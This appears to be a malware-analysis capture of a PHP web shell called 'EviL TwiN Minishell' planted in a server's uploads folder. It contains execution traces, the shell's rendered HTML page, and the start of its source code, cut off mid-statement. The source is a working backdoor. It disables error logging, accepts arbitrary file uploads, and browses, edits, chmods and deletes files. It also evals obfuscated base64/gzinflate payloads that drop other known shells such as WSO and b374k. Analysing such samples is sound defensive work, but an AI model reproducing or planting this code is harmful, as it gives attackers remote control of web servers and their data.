2 52 0 0.002545 467296 is_file 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/prepend.php'
2 52 1 0.002571 467344
2 52 R TRUE
2 53 0 0.002590 467304 filesize 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/prepend.php'
2 53 1 0.002603 467344
2 53 R 57
1 A /var/www/html/uploads/xc.php 1 $size = 0.0556640625
2 54 0 0.002626 467200 round 0 /var/www/html/uploads/xc.php 1 2 0.0556640625 3
2 54 1 0.002639 467272
2 54 R 0.056
1 A /var/www/html/uploads/xc.php 1 $size = 0.056
1 A /var/www/html/uploads/xc.php 1 $size = '0.056 KB'
2 55 0 0.002674 467304 is_writable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/prepend.php'
2 55 1 0.002690 467344
2 55 R FALSE
2 56 0 0.002702 467304 is_readable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/prepend.php'
2 56 1 0.002717 467344
2 56 R TRUE
2 57 0 0.002729 467304 perms 1 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/prepend.php'
3 58 0 0.002742 467304 fileperms 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/prepend.php'
3 58 1 0.002755 467344
3 58 R 33261
2 A /var/www/html/uploads/xc.php 1 $perms = 33261
2 A /var/www/html/uploads/xc.php 1 $info = '-'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= 'w'
2 A /var/www/html/uploads/xc.php 1 $info .= 'x'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 A /var/www/html/uploads/xc.php 1 $info .= 'x'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 A /var/www/html/uploads/xc.php 1 $info .= 'x'
2 57 1 0.002869 467344
2 57 R '-rwxr-xr-x'
2 59 0 0.002884 467304 is_writable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/prepend.php'
2 59 1 0.002898 467344
2 59 R FALSE
2 60 0 0.002911 467304 is_readable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/prepend.php'
2 60 1 0.002926 467344
2 60 R TRUE
2 61 0 0.002944 467408 is_file 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/xc.php'
2 61 1 0.002959 467440
2 61 R TRUE
2 62 0 0.002972 467400 filesize 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/xc.php'
2 62 1 0.002984 467440
2 62 R 13292
1 A /var/www/html/uploads/xc.php 1 $size = 12.98046875
2 63 0 0.003007 467304 round 0 /var/www/html/uploads/xc.php 1 2 12.98046875 3
2 63 1 0.003020 467376
2 63 R 12.98
1 A /var/www/html/uploads/xc.php 1 $size = 12.98
1 A /var/www/html/uploads/xc.php 1 $size = '12.98 KB'
2 64 0 0.003055 467400 is_writable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/xc.php'
2 64 1 0.003069 467440
2 64 R FALSE
2 65 0 0.003082 467400 is_readable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/xc.php'
2 65 1 0.003095 467440
2 65 R TRUE
2 66 0 0.003108 467400 perms 1 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/xc.php'
3 67 0 0.003120 467400 fileperms 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/xc.php'
3 67 1 0.003131 467440
3 67 R 33204
2 A /var/www/html/uploads/xc.php 1 $perms = 33204
2 A /var/www/html/uploads/xc.php 1 $info = '-'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= 'w'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= 'w'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 66 1 0.003239 467440
2 66 R '-rw-rw-r--'
2 68 0 0.003252 467400 is_writable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/xc.php'
2 68 1 0.003266 467440
2 68 R FALSE
2 69 0 0.003279 467400 is_readable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/xc.php'
2 69 1 0.003292 467440
2 69 R TRUE
1 3 1 0.003307 467344
0.003337 326632
TRACE END [2023-02-13 00:20:28.636826]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:47:54.463381]
1 0 1 0.000390 393520
1 3 0 0.000878 465728 {main} 1 /var/www/html/uploads/mini.php 0 0
2 4 0 0.000900 465728 error_reporting 0 /var/www/html/uploads/mini.php 1 1 0
2 4 1 0.000918 465768
2 4 R 22527
2 5 0 0.000932 465728 set_time_limit 0 /var/www/html/uploads/mini.php 1 1 0
2 5 1 0.000947 465792
2 5 R FALSE
2 6 0 0.000965 465760 ini_set 0 /var/www/html/uploads/mini.php 1 2 'log_errors' 0
2 6 1 0.000990 465832
2 6 R '1'
2 7 0 0.001006 465760 ini_set 0 /var/www/html/uploads/mini.php 1 2 'max_execution_time' 0
2 7 1 0.001020 465800
2 7 R '0'
2 8 0 0.001032 465728 ini_set 0 /var/www/html/uploads/mini.php 1 2 'output_buffering' 0
2 8 1 0.001046 465800
2 8 R FALSE
2 9 0 0.001059 465728 ini_set 0 /var/www/html/uploads/mini.php 1 2 'display_errors' 0
2 9 1 0.001072 465800
2 9 R ''
2 10 0 0.001085 465728 get_magic_quotes_gpc 0 /var/www/html/uploads/mini.php 1 0
2 10 1 0.001097 465728
2 10 R FALSE
2 11 0 0.001113 465728 getcwd 0 /var/www/html/uploads/mini.php 1 0
2 11 1 0.001127 465776
2 11 R '/var/www/html/uploads'
1 A /var/www/html/uploads/mini.php 1 $eviltwin = '/var/www/html/uploads'
2 12 0 0.001165 465776 str_replace 0 /var/www/html/uploads/mini.php 1 3 '\\' '/' '/var/www/html/uploads'
2 12 1 0.001180 465872
2 12 R '/var/www/html/uploads'
1 A /var/www/html/uploads/mini.php 1 $eviltwin = '/var/www/html/uploads'
2 13 0 0.001203 465776 explode 0 /var/www/html/uploads/mini.php 1 2 '/' '/var/www/html/uploads'
2 13 1 0.001218 466352
2 13 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/mini.php 1 $eviltwins = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/mini.php 1 $id = 0
1 A /var/www/html/uploads/mini.php 1 $a = TRUE
1 A /var/www/html/uploads/mini.php 1 $id = 1
1 A /var/www/html/uploads/mini.php 1 $i = 0
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $id = 2
1 A /var/www/html/uploads/mini.php 1 $i = 0
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $id = 3
1 A /var/www/html/uploads/mini.php 1 $i = 0
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $id = 4
1 A /var/www/html/uploads/mini.php 1 $i = 0
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $i++
1 A /var/www/html/uploads/mini.php 1 $i++
2 14 0 0.001450 466280 gethostbyname 0 /var/www/html/uploads/mini.php 1 1 'localhost'
2 14 1 0.001498 466360
2 14 R '127.0.0.1'
1 A /var/www/html/uploads/mini.php 1 $ip = '127.0.0.1'
2 15 0 0.001525 466320 php_uname 0 /var/www/html/uploads/mini.php 1 0
2 15 1 0.001539 466432
2 15 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/mini.php 1 $system = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 16 0 0.001574 466432 strtolower 0 /var/www/html/uploads/mini.php 1 1 'safe_mode'
2 16 1 0.001586 466464
2 16 R 'safe_mode'
2 17 0 0.001600 466432 ini_get 0 /var/www/html/uploads/mini.php 1 1 'safe_mode'
2 17 1 0.001615 466464
2 17 R FALSE
1 A /var/www/html/uploads/mini.php 1 $sm = '<font>OFF</font>'
2 18 0 0.001640 466432 str_replace 0 /var/www/html/uploads/mini.php 1 3 '/var/www/html' '' '/var/www/html/uploads'
2 18 1 0.001655 466568
2 18 R '/uploads'
1 A /var/www/html/uploads/mini.php 1 $full = '/uploads'
2 19 0 0.001700 466472 function_exists 0 /var/www/html/uploads/mini.php 1 1 'opendir'
2 19 1 0.001716 466512
2 19 R TRUE
2 20 0 0.001729 466472 opendir 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads'
2 20 1 0.001750 466864
2 20 R resource(4) of type (stream)
1 A /var/www/html/uploads/mini.php 1 $opendir = resource(4) of type (stream)
2 21 0 0.001779 466832 readdir 0 /var/www/html/uploads/mini.php 1 1 resource(4) of type (stream)
2 21 1 0.001800 466912
2 21 R 'mini.php'
1 A /var/www/html/uploads/mini.php 1 $readdir = 'mini.php'
1 A /var/www/html/uploads/mini.php 1 $scandir[] = 'mini.php'
2 22 0 0.001836 467248 readdir 0 /var/www/html/uploads/mini.php 1 1 resource(4) of type (stream)
2 22 1 0.001849 467320
2 22 R '..'
1 A /var/www/html/uploads/mini.php 1 $readdir = '..'
1 A /var/www/html/uploads/mini.php 1 $scandir[] = '..'
2 23 0 0.001881 467280 readdir 0 /var/www/html/uploads/mini.php 1 1 resource(4) of type (stream)
2 23 1 0.001893 467352
2 23 R '.'
1 A /var/www/html/uploads/mini.php 1 $readdir = '.'
1 A /var/www/html/uploads/mini.php 1 $scandir[] = '.'
2 24 0 0.001925 467312 readdir 0 /var/www/html/uploads/mini.php 1 1 resource(4) of type (stream)
2 24 1 0.001938 467392
2 24 R 'prepend.php'
1 A /var/www/html/uploads/mini.php 1 $readdir = 'prepend.php'
1 A /var/www/html/uploads/mini.php 1 $scandir[] = 'prepend.php'
2 25 0 0.001971 467352 readdir 0 /var/www/html/uploads/mini.php 1 1 resource(4) of type (stream)
2 25 1 0.001983 467424
2 25 R 'data'
1 A /var/www/html/uploads/mini.php 1 $readdir = 'data'
1 A /var/www/html/uploads/mini.php 1 $scandir[] = 'data'
2 26 0 0.002015 467384 readdir 0 /var/www/html/uploads/mini.php 1 1 resource(4) of type (stream)
2 26 1 0.002028 467464
2 26 R '.htaccess'
1 A /var/www/html/uploads/mini.php 1 $readdir = '.htaccess'
1 A /var/www/html/uploads/mini.php 1 $scandir[] = '.htaccess'
2 27 0 0.002061 467424 readdir 0 /var/www/html/uploads/mini.php 1 1 resource(4) of type (stream)
2 27 1 0.002074 467464
2 27 R FALSE
1 A /var/www/html/uploads/mini.php 1 $readdir = FALSE
2 28 0 0.002096 467424 closedir 0 /var/www/html/uploads/mini.php 1 1 resource(4) of type (stream)
2 28 1 0.002112 467240
2 28 R NULL
2 29 0 0.002125 467224 sort 0 /var/www/html/uploads/mini.php 1 1 [0 => 'mini.php', 1 => '..', 2 => '.', 3 => 'prepend.php', 4 => 'data', 5 => '.htaccess']
2 29 1 0.002148 467256
2 29 R TRUE
2 30 0 0.002167 467272 is_dir 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.'
2 30 1 0.002185 467336
2 30 R TRUE
2 31 0 0.002199 467304 is_dir 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/..'
2 31 1 0.002213 467352
2 31 R TRUE
2 32 0 0.002226 467312 is_dir 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.htaccess'
2 32 1 0.002240 467352
2 32 R FALSE
2 33 0 0.002254 467312 is_dir 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/data'
2 33 1 0.002267 467352
2 33 R TRUE
2 34 0 0.002280 467312 is_writable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/data'
2 34 1 0.002298 467352
2 34 R TRUE
2 35 0 0.002312 467312 perms 1 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/data'
3 36 0 0.002324 467312 fileperms 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/data'
3 36 1 0.002336 467352
3 36 R 16895
2 A /var/www/html/uploads/mini.php 1 $perms = 16895
2 A /var/www/html/uploads/mini.php 1 $info = 'd'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= 'w'
2 A /var/www/html/uploads/mini.php 1 $info .= 'x'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= 'w'
2 A /var/www/html/uploads/mini.php 1 $info .= 'x'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= 'w'
2 A /var/www/html/uploads/mini.php 1 $info .= 'x'
2 35 1 0.002453 467352
2 35 R 'drwxrwxrwx'
2 37 0 0.002467 467312 is_writable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/data'
2 37 1 0.002483 467352
2 37 R TRUE
2 38 0 0.002497 467312 is_dir 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/mini.php'
2 38 1 0.002511 467352
2 38 R FALSE
2 39 0 0.002523 467320 is_dir 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/prepend.php'
2 39 1 0.002537 467368
2 39 R FALSE
2 40 0 0.002551 467312 is_file 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.'
2 40 1 0.002564 467336
2 40 R FALSE
2 41 0 0.002577 467304 is_file 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/..'
2 41 1 0.002590 467352
2 41 R FALSE
2 42 0 0.002603 467312 is_file 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.htaccess'
2 42 1 0.002617 467352
2 42 R TRUE
2 43 0 0.002630 467312 filesize 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.htaccess'
2 43 1 0.002643 467352
2 43 R 64
1 A /var/www/html/uploads/mini.php 1 $size = 0.0625
2 44 0 0.002666 467256 round 0 /var/www/html/uploads/mini.php 1 2 0.0625 3
2 44 1 0.002680 467328
2 44 R 0.063
1 A /var/www/html/uploads/mini.php 1 $size = 0.063
1 A /var/www/html/uploads/mini.php 1 $size = '0.063 KB'
2 45 0 0.002715 467352 is_writable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.htaccess'
2 45 1 0.002730 467392
2 45 R FALSE
2 46 0 0.002743 467352 is_readable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.htaccess'
2 46 1 0.002758 467392
2 46 R TRUE
2 47 0 0.002771 467352 perms 1 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.htaccess'
3 48 0 0.002784 467352 fileperms 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.htaccess'
3 48 1 0.002796 467392
3 48 R 33188
2 A /var/www/html/uploads/mini.php 1 $perms = 33188
2 A /var/www/html/uploads/mini.php 1 $info = '-'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= 'w'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 47 1 0.002916 467392
2 47 R '-rw-r--r--'
2 49 0 0.002931 467352 is_writable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.htaccess'
2 49 1 0.002947 467392
2 49 R FALSE
2 50 0 0.002960 467352 is_readable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/.htaccess'
2 50 1 0.002975 467392
2 50 R TRUE
2 51 0 0.002988 467352 is_file 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/data'
2 51 1 0.003002 467392
2 51 R FALSE
2 52 0 0.003016 467352 is_file 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/mini.php'
2 52 1 0.003029 467392
2 52 R TRUE
2 53 0 0.003042 467352 filesize 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/mini.php'
2 53 1 0.003053 467392
2 53 R 13292
1 A /var/www/html/uploads/mini.php 1 $size = 12.98046875
2 54 0 0.003077 467256 round 0 /var/www/html/uploads/mini.php 1 2 12.98046875 3
2 54 1 0.003090 467328
2 54 R 12.98
1 A /var/www/html/uploads/mini.php 1 $size = 12.98
1 A /var/www/html/uploads/mini.php 1 $size = '12.98 KB'
2 55 0 0.003125 467352 is_writable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/mini.php'
2 55 1 0.003139 467392
2 55 R FALSE
2 56 0 0.003152 467352 is_readable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/mini.php'
2 56 1 0.003165 467392
2 56 R TRUE
2 57 0 0.003178 467352 perms 1 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/mini.php'
3 58 0 0.003189 467352 fileperms 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/mini.php'
3 58 1 0.003201 467392
3 58 R 33204
2 A /var/www/html/uploads/mini.php 1 $perms = 33204
2 A /var/www/html/uploads/mini.php 1 $info = '-'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= 'w'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= 'w'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 57 1 0.003313 467392
2 57 R '-rw-rw-r--'
2 59 0 0.003327 467352 is_writable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/mini.php'
2 59 1 0.003341 467392
2 59 R FALSE
2 60 0 0.003354 467352 is_readable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/mini.php'
2 60 1 0.003368 467392
2 60 R TRUE
2 61 0 0.003394 467472 is_file 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/prepend.php'
2 61 1 0.003409 467520
2 61 R TRUE
2 62 0 0.003422 467480 filesize 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/prepend.php'
2 62 1 0.003435 467520
2 62 R 57
1 A /var/www/html/uploads/mini.php 1 $size = 0.0556640625
2 63 0 0.003458 467376 round 0 /var/www/html/uploads/mini.php 1 2 0.0556640625 3
2 63 1 0.003471 467448
2 63 R 0.056
1 A /var/www/html/uploads/mini.php 1 $size = 0.056
1 A /var/www/html/uploads/mini.php 1 $size = '0.056 KB'
2 64 0 0.003506 467480 is_writable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/prepend.php'
2 64 1 0.003521 467520
2 64 R FALSE
2 65 0 0.003534 467480 is_readable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/prepend.php'
2 65 1 0.003549 467520
2 65 R TRUE
2 66 0 0.003562 467480 perms 1 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/prepend.php'
3 67 0 0.003575 467480 fileperms 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/prepend.php'
3 67 1 0.003588 467520
3 67 R 33261
2 A /var/www/html/uploads/mini.php 1 $perms = 33261
2 A /var/www/html/uploads/mini.php 1 $info = '-'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= 'w'
2 A /var/www/html/uploads/mini.php 1 $info .= 'x'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 A /var/www/html/uploads/mini.php 1 $info .= 'x'
2 A /var/www/html/uploads/mini.php 1 $info .= 'r'
2 A /var/www/html/uploads/mini.php 1 $info .= '-'
2 A /var/www/html/uploads/mini.php 1 $info .= 'x'
2 66 1 0.003697 467520
2 66 R '-rwxr-xr-x'
2 68 0 0.003711 467480 is_writable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/prepend.php'
2 68 1 0.003726 467520
2 68 R FALSE
2 69 0 0.003739 467480 is_readable 0 /var/www/html/uploads/mini.php 1 1 '/var/www/html/uploads/prepend.php'
2 69 1 0.003754 467520
2 69 R TRUE
1 3 1 0.003769 467416
0.003815 326672
TRACE END [2023-02-13 01:47:54.466912]
Generated HTML code
<html><head><meta name="author" content="Evil Twin"><meta name="theme-color" content="#561000"><meta name="robots" content="noindex, nofollow, noarchive"><link href="https://fonts.googleapis.com/css2?family=Inika&display=swap" rel="stylesheet"><style>body { font-family: "Inika", serif; background-color: #561000; color:white;} tr:hover{ background-color: #ADDIFUWANT;}.first{ background-color: #970B00;}table{ border: 1px #FFFFFF solid;}a{color:white;text-decoration: none;}a:hover{color:lime;}input,select,textarea{border: 1px #FFFFFF solid;-moz-border-radius: 5px;-webkit-border-radius:5px;border-radius:5px;}</style><title>EviL TwiN Minishell</title></head><body><center><a href="?"><font size="5">EviL TwiN Mini</font><font size="5" color="lime">$</font><font size="5">hell</font></a></center><table width="730" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr><td><font color="white">Path :</font> <a href="?eviltwin=/">/</a><a href="?eviltwin=/var">var</a>/<a href="?eviltwin=/var/www">www</a>/<a href="?eviltwin=/var/www/html">html</a>/</td></tr><tr><td><font>Safe Mode : <font>OFF</font></font><br><font>Server IP : 127.0.0.1</font><br><font>System : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</font><br><form enctype="multipart/form-data" method="POST"><font color="white">File Upload :</font> <input type="file" name="file"><input type="submit" value="Go!"></form><form method="post"><font>Shell Creator : </font><select name="eviltwin"><option selected="">Select</option><option value="idx">Indoxploit (3)</option><option value="wso">Wso (4.2.5)</option><option value="b374k">B374k (3.2.3)</option><option value="marijuana">Marijuana (1)</option><option value="alfa">Alfa (4)</option><option value="noname">Noname (1)</option><option value="ets">Evil Twin (1.3)</option></select><input type="submit" value="Get!"></form></td></tr></tbody></table><br><center></center><div id="content"><table width="730" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first"><td><center>NAME</center></td><td><center>SIZE</center></td><td><center>PERMISSION</center></td><td><center>MODIFY</center></td></tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr><td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&eviltwin=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center><form method="POST" action="?option&eviltwin=/var/www/html"><select name="opt"><option value="">Select</option><option value="delete">Delete</option><option value="chmod">Chmod</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="eviltwin" value="/var/www/html/beneri.se_malware_analysis"><input type="submit" value=">"></form></center></td></tr><tr><td><a href="?filesrc=/var/www/html/xc.php&eviltwin=/var/www/html">xc.php</a></td><td><center>12.98 KB</center></td><td><center>-rw-rw-r--</center></td><td><center><form method="POST" action="?option&eviltwin=/var/www/html"><select name="opt"><option value="">Select</option><option value="delete">Delete</option><option value="chmod">Chmod</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="xc.php"><input type="hidden" name="eviltwin" value="/var/www/html/xc.php"><input type="submit" value=">"></form></center></td></tr></tbody></table></div><center><br><a href="https://github.com/eviltwin-dev/eviltwin-minishell"><font color="white">© Evil Twin</font></a></center></body></html>Original PHP code
<?php error_reporting(0);set_time_limit(0);@ini_set('log_errors',0);@ini_set('max_execution_time',0);@ini_set('output_buffering',0);@ini_set('display_errors', 0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}echo '<!DOCTYPE HTML><html><head><meta name="author" content="Evil Twin"><meta name="theme-color" content="#561000"><meta name="robots" content="noindex, nofollow, noarchive"><link href="https://fonts.googleapis.com/css2?family=Inika&display=swap" rel="stylesheet"><style>body { font-family: "Inika", serif; background-color: #561000; color:white;} tr:hover{ background-color: #ADDIFUWANT;}.first{ background-color: #970B00;}table{ border: 1px #FFFFFF solid;}a{color:white;text-decoration: none;}a:hover{color:lime;}input,select,textarea{border: 1px #FFFFFF solid;-moz-border-radius: 5px;-webkit-border-radius:5px;border-radius:5px;}</style><title>EviL TwiN Minishell</title></head><body><center><a href="?"><font size="5">EviL TwiN Mini</font><font size="5" color="lime">$</font><font size="5">hell</font></a></center><table width="730" border ="0" cellpadding="3" cellspacing="1" align="center"><tr><td><font color="white">Path :</font> ';if(isset($_GET['eviltwin'])){$eviltwin = $_GET['eviltwin'];}else{$eviltwin = getcwd();}$eviltwin = str_replace('\\','/',$eviltwin);$eviltwins = explode('/',$eviltwin);foreach($eviltwins as $id=>$pat){if($pat == '' && $id == 0){$a = true;echo '<a href="?eviltwin=/">/</a>';continue;}if($pat == '') continue;echo '<a href="?eviltwin=';for($i=0;$i<=$id;$i++){echo "$eviltwins[$i]";if($i != $id) echo "/";}echo '">'.$pat.'</a>/';}echo '</td></tr><tr><td>';$ip = gethostbyname($_SERVER['HTTP_HOST']);$system = php_uname();$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $eviltwin);if(isset($_FILES['file'])){if(copy($_FILES['file']['tmp_name'],$eviltwin.'/'.$_FILES['file']['name'])){echo '<font color="lime">Upload successfully</font><br />';}else{echo '<font color="white">Upload failed</font><br/>';}}echo '<font>Safe Mode : '.$sm.'</font><br><font>Server IP : '.$ip.'</font><br><font>System : '.$system.'</font><br><form enctype="multipart/form-data" method="POST"><font color="white">File Upload :</font> <input type="file" name="file"><input type="submit" value="Go!"></form><form method="post"><font>Shell Creator : </font><select name="eviltwin"><option selected>Select</option><option value="idx">Indoxploit (3)</option><option value="wso">Wso (4.2.5)</option><option value="b374k">B374k (3.2.3)</option><option value="marijuana">Marijuana (1)</option><option value="alfa">Alfa (4)</option><option value="noname">Noname (1)</option><option value="ets">Evil Twin (1.3)</option></select><input type="submit" value="Get!"></form></center>';if($_POST['eviltwin'] == 'idx') {eval(gzinflate(base64_decode('vVJNa+MwED2n0P8wmIAdMNG9dQxtcSBsSIvjLtuTUZRRLapKRpJpYOl/7zh26C5toXvZg5H1Zt578yHZGRGUNaD2h2TaOZ3CVHk1g9/nZ5PJVLawAGlbNEkPpxC9RLPLY0g0FBLEqJVRIRlQmMCAeQy2DQllpXBzX65v76qaDlKn6Ddyr1ebq/KhKq8222VRphBch9+glUV1X27+mbbdruufRblaPtwVPU1y7U88gMmXvOVqXVBLsh1yHYbOmcEGDyj65CFyhIS2Ht8xOd5PbLurpe58M47yj/9X+pRMpNJIusoHn8S0r3nbtPFsXBWKxkKUCTQBXZ5Ja0KecWgcykU8lZ3W7ESBwN0jhkVc7zQ3T3Ge57Aye/ur1VYF2DaoNWRZxniesUGIjbrRsRxAGs9gS2X1LydqQmj9BWOOv8wfVWi6XefRCSITcS7sM7u+rX5sqjV7Isxq9sw9CTJFvoejb19alEZjkdGpr//Z2F+dfWq85LSDPQQLwiEP+FH+IvlCuh/cGw==')));} elseif($_POST['eviltwin'] == 'wso') {eval(gzinflate(base64_decode('vZJdS+NAFIavK/gfDqGQFEIHRG80DeiSQrG0kkTFqzCdPWMGx0yYmdCFZf/7njQpKii4N3sRknnPed7zMZFdI7wyDeydiaad1TFMlVMz+H16MplMZQsLkKbFJurlGIJ9MLs6hERNIUFEpRrlo0GFCQyaQ29aH1FWDD/u8/X2rqzoRe4U/UbuzWpznT+V+fWmWGZ5DN52+A0sz8r7fPPPWFGsq4csXy2f7rIek1y7Iwcw+ZJbrtYZjSTbIdei72wzlMFfKPrkIXKQhDYO3zQ5no+02VVSd64eV/nu+w89SkZSaSRf5byLQrqveVu34Wy8KhS1gSAR2Hi0aSJN49OEQ21RLsKp7LRmRwQ8t8/oF2G107x5CdM0hcdiC0WNWkOSJIynCRsc2GgYHPoApL0M9aif/pcJau9bd8mY5fv5s/J1t+scWkEwgXNhXtnNtrzdlGv2QprR7JU7MuybOT+76PsJ4mDsLDgO81+m+TDOpxWXnDb+E7wBYZF7fOd7GX3h2a/pLw==')));} elseif($_POST['eviltwin'] == 'b374k') 